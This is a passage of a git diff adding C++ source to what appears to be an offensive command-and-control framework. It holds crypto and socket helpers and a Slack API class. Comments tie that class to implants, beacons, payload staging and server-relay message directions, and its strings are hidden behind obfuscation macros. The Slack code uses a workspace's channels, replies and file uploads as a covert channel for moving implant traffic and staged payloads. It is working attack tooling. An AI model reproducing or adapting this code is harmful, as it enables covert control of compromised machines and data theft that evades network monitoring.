exchange (public and private). + /// @throws std::runtime_error if keys couldn't be generated + ExchangeKeys GenerateExchangeKeys(); + + /// Generate a session keys on client side. + /// @returns a pair of session keys to use in symmetric encryption + /// @throws std::runtime_error if keys couldn't be generated + SessionKeys GenerateClientSessionKeys(ExchangeKeys const& selfKeys, ExchangePublicKey const& serverKey); + + /// Generate a session keys on server side. + /// @returns a pair of session keys to use in symmetric encryption + /// @throws std::runtime_error if keys couldn't be generated + SessionKeys GenerateServerSessionKeys(ExchangeKeys const& selfKeys, ExchangePublicKey const& clientKey); + + /// Decrypt a message using provided SessionTx key. + /// @param plaintext message to encrypt. + /// @param key session tx key. + /// @returns Encrypted message prefixed with nonce. + /// @throws std::runtime_error. + ByteVector Encrypt(ByteView plaintext, SessionTxKey const& key); + + /// Decrypt a message using provided SessionRx key. + /// @param ciphertext message to decrypt (must be prefixed with nonce used to encrypt that message). + /// @param key session rx key. + /// @returns Decrypted message. + /// @throws std::invalid_argument, std::runtime_error. + ByteVector Decrypt(ByteView message, SessionRxKey const& key); + + /// Encrypt a message using provided symmetric key. + /// @param plaintext message to encrypt. + /// @param key symmetric key. + /// @return Encrypted message prefixed with nonce. + /// @throws std::runtime_error. + ByteVector EncryptAnonymously(ByteView plaintext, SymmetricKey const& key); + + /// Decrypt a message using provided symmetric key. + /// @param ciphertext message to decrypt (must be prefixed with nonce used to encrypt that message). + /// @param key symmetric key. + /// @return Decrypted message. + /// @throws std::invalid_argument, std::runtime_error. + ByteVector DecryptFromAnonymous(ByteView message, SymmetricKey const& key); + + /// Encrypt a message anonymously. + /// @param plaintext message to encrypt. + /// @param key recipient public key. + /// @return Encrypted message prefixed with a nonce. + /// @throws std::runtime_error. + ByteVector EncryptAnonymously(ByteView plaintext, PublicKey const& encryptionKey); + + /// Decrypt a message from an anonymous sender. + /// @param ciphertext message to decrypt (must be prefixed with a nonce used to encrypt that message). + /// @param myEncryptionKey recipients public key. + /// @param myDecryptionKey recipients private key. + /// @return Decrypted message. + /// @throws std::invalid_argument, std::runtime_error. + ByteVector DecryptFromAnonymous(ByteView ciphertext, PublicKey const& myEncryptionKey, PrivateKey const& myDecryptionKey); + + /// Encrypt a message using provided symmetric key and signs the message. + /// @param plaintext message to encrypt. + /// @param key symmetric key. + /// @return Encrypted message prefixed with nonce. + /// @throws std::runtime_error. + ByteVector EncryptAndSign(ByteView plaintext, SymmetricKey const& key, PrivateSignature const& signature); + + /// Decrypt a message using provided symmetric key and checks sender signature. + /// @param ciphertext message to decrypt (must be prefixed with nonce used to encrypt that message). + /// @param key symmetric key. + /// @return Decrypted message. + /// @throws std::invalid_argument, std::runtime_error. + ByteVector DecryptAndVerify(ByteView ciphertext, SymmetricKey const& key, PublicSignature const& signature); + + /// Encrypt a message and authenticates it. + /// @param plaintext message to encrypt. + /// @param theirPublicKey recipient's public key. + /// @param myPrivateKey sender's private key. + /// @return Encrypted message prefixed with a nonce. + /// @throws std::runtime_error. + ByteVector EncryptAndAuthenticate(ByteView plaintext, PublicKey const& theirPublicKey, PrivateKey const& myPrivateKey); + + /// Decrypt a message and verifies identity of the sender. + /// @param message message to decrypt (must be prefixed with a nonce used to encrypt that message). + /// @param theirPublicKey sender's public key. + /// @param myPrivateKey recipient's private key. + /// @return Decrypted message. + /// @throws std::invalid_argument, std::runtime_error. + ByteVector DecryptAndAuthenticate(ByteView message, PublicKey const& theirPublicKey, PrivateKey const& myPrivateKey); + + /// Signs a message. + /// @param message to sign. + /// @param signature private signature key. + /// @return Signed message. + /// @throws std::runtime_error. + ByteVector SignMessage(ByteView message, PrivateSignature const& signature); + + /// Verifies a signed message. + /// @param signedMessage message to check against signature. + /// @param signature public signature used to verify the message. + /// @return message without signature. + /// @throws std::invalid_argument, std::runtime_error. + ByteVector VerifyMessage(ByteView signedMessage, PublicSignature const& signature); + + /// Converts a public signature key to a public encryption key. + /// @param signature public signature to convert. + /// @return converted public encryption key. + /// @throws std::runtime_error. + PublicKey ConvertToKey(PublicSignature const& signature); + + /// Converts a private signature key to a private encryption key. + /// @param signature private signature to convert. + /// @return converted private encryption key. + /// @throws std::runtime_error. + PrivateKey ConvertToKey(PrivateSignature const& signature); + + /// Converts a private signature key to a public signature key. + /// @param signature private signature to convert. + /// @return converted public signature key. + /// @throws std::runtime_error. + PublicSignature ExtractPublic(PrivateSignature const& signature); + } +} diff --git a/Src/Common/MWR/PrecompiledHeader.hpp b/Src/Common/MWR/PrecompiledHeader.hpp new file mode 100644 index 0000000..11c8c09 --- /dev/null +++ b/Src/Common/MWR/PrecompiledHeader.hpp @@ -0,0 +1,7 @@ +#pragma once + +// Sub-precompiled headers. +#include "CppTools/PrecompiledHeader.hpp" +#include "WinTools/PrecompiledHeader.hpp" +#include "Sockets/PrecompiledHeader.hpp" +#include "Crypto/PrecompiledHeader.hpp" diff --git a/Src/Common/MWR/SecureString.hpp b/Src/Common/MWR/SecureString.hpp new file mode 100644 index 0000000..dfe47d4 --- /dev/null +++ b/Src/Common/MWR/SecureString.hpp @@ -0,0 +1,120 @@ +#pragma once + +// For SecureZeroMemory +#ifndef NOMINMAX +# define NOMINMAX //< Exclude min and max macros from windows.h. +#endif +#define WIN32_LEAN_AND_MEAN //< Exclude rarely-used stuff from Windows headers. +#include + +#include + +// based on https://codereview.stackexchange.com/questions/107991/hacking-a-securestring-based-on-stdbasic-string-for-c + +namespace MWR +{ + /// Minimal allocator zeroing on deallocation + /// @tparam T type to allocate + template + struct SecureAllocator + { + using value_type = T; + using propagate_on_container_move_assignment = typename std::allocator_traits>::propagate_on_container_move_assignment; + + /// Default constructor + constexpr SecureAllocator() = default; + + /// Defaulted copy constructor + /// @param other SecureAllocator + constexpr SecureAllocator(const SecureAllocator&) = default; + + /// Other type constructor + /// @tparam U - different type + /// @param other SecureAllocator + template + constexpr SecureAllocator(const SecureAllocator&) noexcept + { + } + + /// Allocate memory for n T objects + /// @param n - count of T objects to allocate + /// @returns pointer to allocated memory + static T* allocate(std::size_t n) + { + return std::allocator{}.allocate(n); + } + + /// Clear and deallocate memory for n T objects + /// @param p - memory pointer + /// @param n - count of T objects to deallocate + static void deallocate(T* p, std::size_t n) noexcept + { + SecureZeroMemory(p, n * sizeof * p); + std::allocator{}.deallocate(p, n); + } + }; + + /// Equality operator + /// @returns true + template + constexpr bool operator== (const SecureAllocator&, const SecureAllocator&) noexcept + { + return true; + } + + /// Inequality operator + /// @returns false + template + constexpr bool operator!= (const SecureAllocator&, const SecureAllocator&) noexcept + { + return false; + } + + /// alias for string with SecureAllocator + using SecureString = std::basic_string, SecureAllocator>; + + /// alias for wstring with SecureAllocator + using SecureWString = std::basic_string, SecureAllocator>; +} + +namespace std +{ + /// Specialized SecureString destructor. + /// Overwrites internal buffer (if SSO is in effect) + template<> + basic_string, MWR::SecureAllocator>::~basic_string() + { + // Clear internal buffer if SSO is in effect + auto& _My_data = this->_Get_data(); + if (!_My_data._Large_string_engaged()) + SecureZeroMemory(_My_data._Bx._Buf, sizeof _My_data._Bx._Buf); + + // This is a copy of basic_string dtor + _Tidy_deallocate(); +// for some reason this can't be used when compiling into precompiled header +//#if _ITERATOR_DEBUG_LEVEL != 0 +// auto && _Alproxy = _GET_PROXY_ALLOCATOR(_Alty, _Getal()); +// _Delete_plain(_Alproxy, _STD exchange(_Get_data()._Myproxy, nullptr)); +//#endif // _ITERATOR_DEBUG_LEVEL != 0 + } + + /// Specialized SecureWString destructor. + /// Overwrites internal buffer (if SSO is in effect) + template<> + basic_string, MWR::SecureAllocator>::~basic_string() + { + // Clear internal buffer if SSO is in effect + auto& _My_data = this->_Get_data(); + if (!_My_data._Large_string_engaged()) + SecureZeroMemory(_My_data._Bx._Buf, sizeof _My_data._Bx._Buf); + + // This is a copy of basic_string dtor + _Tidy_deallocate(); +// for some reason this can't be used when compiling into precompiled header +//#if _ITERATOR_DEBUG_LEVEL != 0 +// auto && _Alproxy = _GET_PROXY_ALLOCATOR(_Alty, _Getal()); +// _Delete_plain(_Alproxy, _STD exchange(_Get_data()._Myproxy, nullptr)); +//#endif // _ITERATOR_DEBUG_LEVEL != 0 + SecureZeroMemory(this, sizeof * this); + } +} diff --git a/Src/Common/MWR/Slack/SlackApi.cpp b/Src/Common/MWR/Slack/SlackApi.cpp new file mode 100755 index 0000000..440cc39 --- /dev/null +++ b/Src/Common/MWR/Slack/SlackApi.cpp @@ -0,0 +1,345 @@ +#include "stdafx.h" +#include "SlackApi.h" +#include +#include +#include + + +MWR::Slack::Slack(std::string const& token, std::string const& channelName) +{ + if (auto winProxy = WinTools::GetProxyConfiguration(); !winProxy.empty()) + this->m_HttpConfig.set_proxy(winProxy == OBF_W(L"auto") ? web::web_proxy::use_auto_discovery : web::web_proxy(winProxy)); + + this->m_Token = token; + + std::string lowerChannelName = channelName; + std::transform(lowerChannelName.begin(), lowerChannelName.end(), lowerChannelName.begin(), [](unsigned char c) { return std::tolower(c); }); + + SetChannel(CreateChannel(lowerChannelName)); +} + +void MWR::Slack::SetChannel(std::string const &channelId) +{ + this->m_Channel = channelId; +} + +void MWR::Slack::SetToken(std::string const &token) +{ + this->m_Token = token; +} + +std::string MWR::Slack::WriteMessage(std::string text) +{ + json j; + j[OBF("channel")] = this->m_Channel; + j[OBF("text")] = text; + std::string url = OBF("https://slack.com/api/chat.postMessage"); + + json output = SendHttpRequest(url, OBF("application/json"), j); + + return output[OBF("message")][OBF("ts")].get(); //return the timestamp so a reply can be viewed +} + + + +std::map MWR::Slack::ListChannels() +{ + std::map channelMap; + std::string url = OBF("https://slack.com/api/channels.list?token=") + this->m_Token + OBF("&exclude_members=true&exclude_archived=true"); + + json response = SendHttpRequest(url, OBF("application/json"), NULL); + + size_t size = response[OBF("channels")].size(); + + for (auto &channel : response[OBF("channels")]) + { + std::string cName = channel[OBF("name")]; + if (cName == OBF("everyone")) + continue; + + std::string cId = channel[OBF("id")].get(); + channelMap.insert({ cName, cId }); + } + + return channelMap; +} + + + +std::string MWR::Slack::CreateChannel(std::string const &channelName) +{ + json j; + std::string url = OBF("https://slack.com/api/channels.create"); + j[OBF("token")] = this->m_Token; + j[OBF("name")] = channelName; + + json response = SendHttpRequest(url, OBF("application/json"), j); + + if (!response.contains(OBF("channel"))) //attempt to find the channel using API call + { + std::map channels = this->ListChannels(); + + if (channels.find(channelName) != channels.end()) + { + return channels[channelName]; + } + else + throw std::runtime_error(OBF("Throwing exception: unable to create channel\n")); + } + else + { + return response[OBF("channel")][OBF("id")].get(); + } +} + + +std::vector MWR::Slack::ReadReplies(std::string const ×tamp) +{ + std::string url = OBF("https://slack.com/api/channels.replies?token=") + this->m_Token + OBF("&channel=") + this->m_Channel + OBF("&thread_ts=") + timestamp; + json output = SendHttpRequest(url, OBF("application/json"), NULL); + std::vector ret; + + //This logic is really messy, in reality the checks are over cautious, however there is an edgecase + //whereby a message could be created with no replies of the implant that wrote triggers an exception or gets killed. + //If that was the case, and we didn't sanity check, we could run into problems. + if (output.contains(OBF("messages"))) + { + json m = output[OBF("messages")]; + if (m[0].contains(OBF("replies")) && m[0].size() > 1) + { + if (m[1].contains(OBF("files"))) //the reply contains a file, handle this differently + { + std::string ts = m[1][OBF("ts")]; + std::string fileUrl = m[1][OBF("files")][0][OBF("url_private")].get(); + std::string text = GetFile(fileUrl); + //recreate a "message" from the data within the file. + json j; + j[OBF("ts")] = ts.c_str(); + j[OBF("text")] = text.c_str(); + ret.push_back(j); + } + else + { + for (size_t i = 1u; i < m.size(); i++) //skip the first message (it doesn't contain the data we want). + { + json reply = m[i]; + ret.push_back(reply); + } + + } + } + + } + + return ret; +} + +std::vector MWR::Slack::GetMessagesByDirection(std::string const &direction) +{ + std::vector ret; + json messages, resp; + std::string cursor; + + //Slack suggest only requesting the 200 most recent messages. + //If there are more than 200, the has_more value will be true, at which point + //we need to grab the cursor and get the next lot of messages. + //This only becomes a problem with lots of beacons (especially if many are staging at the same time) + do + { + std::string url = OBF("https://slack.com/api/conversations.history?limit=200&token="); + url.append(this->m_Token + OBF("&") + OBF("channel=") + this->m_Channel); + + //Will be empty on the first run, if has_more == false this won't be executed again + if (!cursor.empty()) + url.append(OBF("&cursor=") + cursor); + + //Actually send the http request and grab the messages + resp = SendHttpRequest(url, OBF("application/json"), NULL); + + messages = resp[OBF("messages")]; + + //if there are more than 200 messages, we don't want to miss any, so update the cursor. + if(resp[OBF("has_more")] == OBF("true")) + cursor = resp[OBF("next_cursor")]; + + //now grab the 200 messages data. + for (auto &m : messages) + { + std::string data = m[OBF("text")]; + + //make sure it's a message we care about + if (data.find(direction) != std::string::npos) + { + ret.push_back(m[OBF("ts")].get()); // - experimental + } + + } + } while (resp[OBF("has_more")] == OBF("true")); + + return ret; +} + +void MWR::Slack::UpdateMessage(std::string const &message, std::string const ×tamp) +{ + std::string url = OBF("https://slack.com/api/chat.update"); + + json j; + j[OBF("channel")] = this->m_Channel; + j[OBF("text")] = message; + j[OBF("ts")] = timestamp; + + SendHttpRequest(url, OBF("application/json"), j); +} + +void MWR::Slack::WriteReply(std::string const &text, std::string const ×tamp) +{ + //this is more than 30 messages, send it as a file (we do this infrequently as file uploads restricted to 20 per minute). + //Using file upload for staging (~88 messages) is a huge improvement over sending actual replies. + if (text.length() >= 120000) + { + this->UploadFile(text, timestamp); + return; + } + + if (text.length() > 40000) //hide how large messages are sent. + { + return this->WriteReplyLarge(text, timestamp); + } + + int totalSent = 0; + + json j; + j[OBF("channel")] = this->m_Channel; + j[OBF("text")] = text; + j[OBF("thread_ts")] = timestamp; + std::string url = OBF("https://slack.com/api/chat.postMessage"); + + json response = SendHttpRequest(url, OBF("application/json"), j); +} + +void MWR::Slack::DeleteMessage(std::string const ×tamp) +{ + json j; + j[OBF("channel")] = this->m_Channel; + j[OBF("ts")] = timestamp; + j[OBF("token")] = this->m_Token; + std::string url = OBF("https://slack.com/api/chat.delete"); + + json response = SendHttpRequest(url, OBF("application/json"), j); + +} + +//Slack limits a messages to 40000 characters - this actually gets split across 10 4000 character messages +void MWR::Slack::WriteReplyLarge(std::string const &data, std::string const &ts) +{ + std::string ret; + int start = 0; + int size = static_cast(data.length()); + int end = size; + + //Write 40k character messages at a time + while (size > 40000) + { + this->WriteReply(data.substr(start, 40000), ts); + start += 40000; + size -= 40000; + + + std::this_thread::sleep_for(std::chrono::seconds(7)); //throttle our output so slack blocks us less (40k characters is 10 messages) + } + + this->WriteReply(data.substr(start, data.length()), ts); //write the final part of the payload +} + +json MWR::Slack::SendHttpRequest(std::string const& host, std::string const& contentType, json const& data) +{ + std::string authHeader = OBF("Bearer ") + this->m_Token; + std::string contentHeader = OBF("Content-Type: ") + contentType; + std::string postData; + + while (true) + { + web::http::client::http_client webClient(utility::conversions::to_string_t(host), this->m_HttpConfig); + web::http::http_request request; + + if (data != NULL) + { + request = web::http::http_request(web::http::methods::POST); + + if (data.contains(OBF("postData"))) + postData = data[OBF("postData")].get(); + else + postData = data.dump(); + + request.headers().set_content_type(utility::conversions::to_string_t(contentType)); + request.set_body(utility::conversions::to_string_t(postData)); + } + else + { + request = web::http::http_request(web::http::methods::GET); + } + request.headers().add(OBF_W(L"Authorization"), utility::conversions::to_string_t(authHeader)); + + pplx::task task = webClient.request(request).then([&](web::http::http_response response) + { + return response; + }); + + task.wait(); + web::http::http_response resp = task.get(); + + if (resp.status_code() == web::http::status_codes::OK) + { + auto respData = resp.extract_string(); + return json::parse(respData.get()); + } + else if (resp.status_code() == web::http::status_codes::TooManyRequests) + { + std::random_device randomDevice; + std::mt19937 randomEngine(randomDevice()); // seed the generator + std::uniform_int_distribution<> distribution(0, 10); // define the range + int sleepTime = 10 + distribution(randomEngine); //sleep between 10 and 20 seconds + + std::this_thread::sleep_for(std::chrono::seconds(sleepTime)); + } + else + throw std::exception(OBF("[x] Non 200/429 HTTP Response\n")); + } +} + +void MWR::Slack::UploadFile(std::string const &data, std::string const &ts) +{ + std::string url = OBF("https://slack.com/api/files.upload?token=") + this->m_Token + OBF("&channels=") + this->m_Channel + OBF("&thread_ts=") + ts; + + std::string encoded = utility::conversions::to_utf8string(web::http::uri::encode_data_string(utility::conversions::to_string_t(data))); + + json toSend; + toSend[OBF("postData")] = OBF("filename=test5&content=") + encoded; + + json response = SendHttpRequest(url, OBF("application/x-www-form-urlencoded"), toSend); +} + + +std::string MWR::Slack::GetFile(std::string const &url) +{ + std::string host = url; + std::string authHeader = OBF("Bearer ") + this->m_Token; + + web::http::client::http_client webClient(utility::conversions::to_string_t(host), this->m_HttpConfig); + web::http::http_request request; + + request.headers().add(OBF_W(L"Authorization"), utility::conversions::to_string_t(authHeader)); + + pplx::task task = webClient.request(request).then([&](web::http::http_response response) + { + if (response.status_code() == web::http::status_codes::OK) + return response.extract_utf8string(); + else + return pplx::task{}; + }); + + task.wait(); + std::string resp = task.get(); + + return resp; +} diff --git a/Src/Common/MWR/Slack/SlackApi.h b/Src/Common/MWR/Slack/SlackApi.h new file mode 100755 index 0000000..1477b07 --- /dev/null +++ b/Src/Common/MWR/Slack/SlackApi.h @@ -0,0 +1,101 @@ +#pragma once + +#include "Common/json/json.hpp" +#include "Common/CppRestSdk/include/cpprest/http_client.h" + +using json = nlohmann::json; //for easy parsing of json API: https://github.com/nlohmann/json + +namespace MWR +{ + class Slack + { + public: + + /// Constructor for the Slack Api class. + /// @param token - the token generated by Slack when an "app" was installed to a workspace + /// @param proxyString - the proxy to use + Slack(std::string const& token, std::string const& channelName); + + /// Default constructor. + Slack() = default; + + /// Write a message to the channel this Slack object is set to. + /// @param text - the text of the message + /// @return - a timestamp of the message that was written to the channel. + std::string WriteMessage(std::string text); + + /// Set the channel that this object uses for communications + /// @param channel - the channelId (not name), for example CGPMGFGSH. + void SetChannel(std::string const &channelId); + + /// set the token for this object. + /// @param token - the textual api token. + void SetToken(std::string const &token); + + /// Creates a channel on slack, if the channel exists already, will call ListChannels internally to get the channelId. + /// @param channelName - the actual name of the channel, such as "general". + /// @return - the channelId of the new or already existing channel. + std::string CreateChannel(std::string const &channelName); + + /// Read the replies to a message + /// @param timestamp - the timestamp of the original message, from which we can gather the replies. + /// @return - an array of json objects contaning the replies to the original message. + std::vector ReadReplies(std::string const ×tamp); + + /// List all the channels in the workspace the object's token is tied to. + /// @return - a map of {channelName -> channelId} + std::map ListChannels(); + + /// Get all of the messages by a direction. This is a C3 specific method, used by a server relay to get client messages and vice versa. + /// @param direction - the direction to search for (eg. "S2C"). + /// @return - a vector of timestamps, where timestamp allows replies to be read later + std::vector GetMessagesByDirection(std::string const &direction); + + /// Edit a previously sent message. + /// @param message - the message to update to, this will overwrite the previous message. + /// @param timestamp - the timestamp of the message to update. + void UpdateMessage(std::string const &message, std::string const ×tamp); + + /// Create a thread on a message by writing a reply to it. + /// @param text - the text to send as a reply. + /// @param timestamp - the timestamp of the message that the reply is for. + void WriteReply(std::string const &text, std::string const ×tamp); + + /// Delete a message from the channel + /// @param timestamp - the timestamp of the message to delete. + void DeleteMessage(std::string const ×tamp); + + + + private: + + /// Slack restricts the amount of data you can send as a message. This method handles that without the client being aware. + /// This method is only used when replies are sent. + /// @param data - the payload to be sent. + /// @param ts - the timestamp of the original message to reply to. + void WriteReplyLarge(std::string const &data, std::string const &ts); + + /// The channel through which messages are sent and recieved, will be sent when the object is created. + std::string m_Channel; + + /// The Slack API token that allows the object access to the workspace. Needs to be manually created as described in documentation. + std::string m_Token; + + web::http::client::http_client_config m_HttpConfig; + + json SendHttpRequest(std::string const& host, std::string const& contentType, json const& data); + + /// Use Slack's file API to upload data as files. This is useful when a payload is large (for example during implant staging). + /// This function is called internally whenever a WriteReply is called with a payload of more than 120k characters. + /// @param data - the data to be sent. + /// @param ts - the timestamp, needed as this method is only used during WriteReply. + void UploadFile(std::string const &data, std::string const &ts); + + /// Use Slack's File API to retrieve files. + /// @param url - the url where the file can be retrieved. + /// @return - the data within the file. + std::string GetFile(std::string const &url); + + }; + +} diff --git a/Src/Common/MWR/Sockets/AddrInfo.cpp b/Src/Common/MWR/Sockets/AddrInfo.cpp new file mode 100644 index 0000000..474cfe2 --- /dev/null +++ b/Src/Common/MWR/Sockets/AddrInfo.cpp @@ -0,0 +1,14 @@ +#include "StdAfx.h" +#include "AddrInfo.h" +#include "SocketsException.h" + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::AddrInfo::AddrInfo(std::string_view host, std::string_view service, int flags, int family, int socktype, int protocol) +{ + addrinfo hints{ flags, family, socktype, protocol }; + addrinfo* result{}; + // Resolve the local address and port to be used by the server + if (auto err = getaddrinfo(host.data(), service.data(), &hints, &result)) + throw SocketsException(OBF("getaddrinfo failed"), err); + m_Addrinfo = std::unique_ptr(result, &freeaddrinfo); +} diff --git a/Src/Common/MWR/Sockets/AddrInfo.h b/Src/Common/MWR/Sockets/AddrInfo.h new file mode 100644 index 0000000..d2d10ac --- /dev/null +++ b/Src/Common/MWR/Sockets/AddrInfo.h @@ -0,0 +1,25 @@ +#pragma once + +namespace MWR +{ + /// Wrapper to struct addrinfo + /// @note user has to call WSAStartup; + class AddrInfo + { + public: + /// getaddrinfo wrapper + /// @throws WinSocketsException + AddrInfo(std::string_view host, std::string_view service, int flags = AI_PASSIVE, int family = AF_INET, int socktype = SOCK_STREAM, int protocol = IPPROTO_TCP); + + /// getaddrinfo wrapper for IPv4/TCP + /// @throws WinSocketsException + AddrInfo(std::string_view host, uint16_t port) : AddrInfo(host, std::to_string(port)) {}; + + /// Accesses the underlying addrinfo + /// @return underlying addrinfo struct + const addrinfo* operator->() const noexcept { return m_Addrinfo.get(); } + + private: + std::unique_ptr m_Addrinfo{ nullptr, &freeaddrinfo }; + }; +} diff --git a/Src/Common/MWR/Sockets/DuplexConnection.cpp b/Src/Common/MWR/Sockets/DuplexConnection.cpp new file mode 100644 index 0000000..7572284 --- /dev/null +++ b/Src/Common/MWR/Sockets/DuplexConnection.cpp @@ -0,0 +1,142 @@ +#include "StdAfx.h" +#include "DuplexConnection.h" +#include "SocketsException.h" + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::DuplexConnection::DuplexConnection(ClientSocket sock) : m_IsSending{ false }, m_IsReceiving{ false }, m_ClientSocket{ std::move(sock) } +{ +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::DuplexConnection::DuplexConnection(std::string_view addr, uint16_t port) : DuplexConnection{ ClientSocket(addr, port) } +{ +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::DuplexConnection::~DuplexConnection() +{ + { + std::unique_lock lock(m_MessagesMutex); + Stop(); + } + m_NewMessage.notify_all(); + if (m_SendingThread.joinable()) + m_SendingThread.join(); + if (m_ReceivingThread.joinable()) + m_ReceivingThread.join(); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::DuplexConnection::StartSending() +{ + m_IsSending = true; + m_SendingThread = std::thread([this] + { + try + { + while (true) + { + ByteVector message; + { + std::unique_lock lock(m_MessagesMutex); + if (!m_IsSending) + break; + message = GetMessage(lock); + if (message.empty()) + break; // connection closed + } + m_ClientSocket.Send(message); + } + } + catch (MWR::SocketsException&) + { + Stop(); + } + }); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::DuplexConnection::Receive() +{ + return m_ClientSocket.Receive(); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::DuplexConnection::StartReceiving(std::function callback) +{ + m_IsReceiving = true; + m_ReceivingThread = std::thread([this, callback]() + { + try + { + while (true) + { + if (m_IsReceiving && !m_ClientSocket.HasReceivedData()) + { + std::this_thread::sleep_for(10ms); + continue; + } + if (!m_IsReceiving) + break; + + auto message = Receive(); + if (!m_IsReceiving || message.empty()) + break; + callback(message); + } + } + catch (MWR::SocketsException&) + { + Stop(); + } + }); +} + +void MWR::DuplexConnection::Stop() +{ + m_IsSending = false; + m_IsReceiving = false; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +bool MWR::DuplexConnection::IsSending() const +{ + return m_IsSending; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::DuplexConnection::Send(ByteVector message) +{ + std::scoped_lock lock(m_MessagesMutex); + m_Messages.emplace(std::move(message)); + m_NewMessage.notify_one(); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::DuplexConnection::GetMessage(std::unique_lock& lock) +{ + auto popMessage = [this] + { + auto ret = m_Messages.front(); + m_Messages.pop(); + return ret; + }; + + if (!m_Messages.empty()) + { + return popMessage(); + } + else + { + while (true) + { + m_NewMessage.wait(lock); + if (!m_IsSending) + return {}; // stop requested + else if (!m_Messages.empty()) + return popMessage(); + else + continue; // condition_variable spuriously unlocked, go back to waiting + } + } +} diff --git a/Src/Common/MWR/Sockets/DuplexConnection.h b/Src/Common/MWR/Sockets/DuplexConnection.h new file mode 100644 index 0000000..52117c2 --- /dev/null +++ b/Src/Common/MWR/Sockets/DuplexConnection.h @@ -0,0 +1,59 @@ +#pragma once + +#include "Socket.h" +#include "Common/MWR/CppTools/ByteVector.h" +#include "Common/MWR/CppTools/ByteView.h" + +namespace MWR +{ + class DuplexConnection + { + public: + /// Create a duplex connection with address and port + DuplexConnection(std::string_view addr, uint16_t port); + + /// Create a duplex connection over a socket + DuplexConnection(ClientSocket sock); + + /// Enable move constructor + DuplexConnection(DuplexConnection&&) = default; + + /// Enable move assignment + DuplexConnection& operator =(DuplexConnection&&) = default; + + /// Dtor + ~DuplexConnection(); + + /// Start a sending thread + void StartSending(); + + /// Send a message through connection + void Send(ByteVector message); + + /// Receive data from connection + ByteVector Receive(); + + /// Start processing received data in separate thread + void StartReceiving(std::function callback); + + /// Stop sending and receiving + void Stop(); + + /// Check if sending is on + bool IsSending() const; + + private: + /// Gets next message queued to send + ByteVector GetMessage(std::unique_lock& lock); + + std::atomic_bool m_IsSending; + std::atomic_bool m_IsReceiving; + std::thread m_SendingThread; + std::thread m_ReceivingThread; + ClientSocket m_ClientSocket; + + std::mutex m_MessagesMutex; + std::condition_variable m_NewMessage; + std::queue m_Messages; + }; +} diff --git a/Src/Common/MWR/Sockets/InitializeSockets.cpp b/Src/Common/MWR/Sockets/InitializeSockets.cpp new file mode 100644 index 0000000..0a1afd2 --- /dev/null +++ b/Src/Common/MWR/Sockets/InitializeSockets.cpp @@ -0,0 +1,18 @@ +#include "StdAfx.h" +#include "InitializeSockets.h" +#include "SocketsException.h" + +namespace MWR +{ + void InitializeSockets::Initialize() + { + WSADATA wsaData; + if (auto err = WSAStartup(MAKEWORD(2, 2), &wsaData)) + throw MWR::SocketsException(OBF("Failed to initialize WinSock"), err); + } + + void InitializeSockets::Deinitialize() noexcept + { + WSACleanup(); // ignore errors + } +} diff --git a/Src/Common/MWR/Sockets/InitializeSockets.h b/Src/Common/MWR/Sockets/InitializeSockets.h new file mode 100644 index 0000000..b6c613e --- /dev/null +++ b/Src/Common/MWR/Sockets/InitializeSockets.h @@ -0,0 +1,42 @@ +#pragma once + +namespace MWR { + + /// wrapper to WSAStartup and WSACleanup + class InitializeSockets + { + // TODO reference counting to avoid unecessary WAS* calls + public: + /// Initialize sockets + /// @throws WinSocketsException + InitializeSockets() { Initialize(); } + + /// Initialize sockets. Allow copy ctor. + /// @throws WinSocketsException + InitializeSockets(InitializeSockets const&) { Initialize(); } + + /// Initialize sockets. Allow copy assignment. + /// @throws WinSocketsException + InitializeSockets& operator=(InitializeSockets const&) { Initialize(); return *this; } + + /// Initialize sockets. Allow move ctor. + /// @throws WinSocketsException + InitializeSockets(InitializeSockets&&) { Initialize(); } + + /// Initialize sockets. Allow move assignment. + /// @throws WinSocketsException + InitializeSockets& operator=(InitializeSockets&&) { Initialize(); return *this; } + + /// Dtor. Deinitialize sockets. + ~InitializeSockets() noexcept { Deinitialize(); } + + private: + /// Initialize sockets. Effectively calls WSAStartup + /// @throws WinSocketsException + static void Initialize(); + + /// Initialize sockets. Effectively calls WSACleanup + /// @note ignores errors, because called in destructor. + static void Deinitialize() noexcept; + }; +} diff --git a/Src/Common/MWR/Sockets/PrecompiledHeader.hpp b/Src/Common/MWR/Sockets/PrecompiledHeader.hpp new file mode 100644 index 0000000..4c235b7 --- /dev/null +++ b/Src/Common/MWR/Sockets/PrecompiledHeader.hpp @@ -0,0 +1,15 @@ +#pragma once + +// Standard library includes. +#include +#include +#include +#include +#include +#include + +// Windows includes. +#include //< Windows Sockets. + +// Static libraries. +#pragma comment(lib, "Ws2_32.lib") //< Windows Sockets. diff --git a/Src/Common/MWR/Sockets/Socket.cpp b/Src/Common/MWR/Sockets/Socket.cpp new file mode 100644 index 0000000..25cd48d --- /dev/null +++ b/Src/Common/MWR/Sockets/Socket.cpp @@ -0,0 +1,172 @@ +#include "StdAfx.h" +#include "Socket.h" +#include "SocketsException.h" + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::Socket::Socket(const AddrInfo& addrinfo) +{ + if (m_Socket = socket(addrinfo->ai_family, addrinfo->ai_socktype, addrinfo->ai_protocol); m_Socket == INVALID_SOCKET) + throw SocketsException(OBF("Failed to create socket. Error: ") + std::to_string(WSAGetLastError()) + OBF("."), WSAGetLastError()); +} + 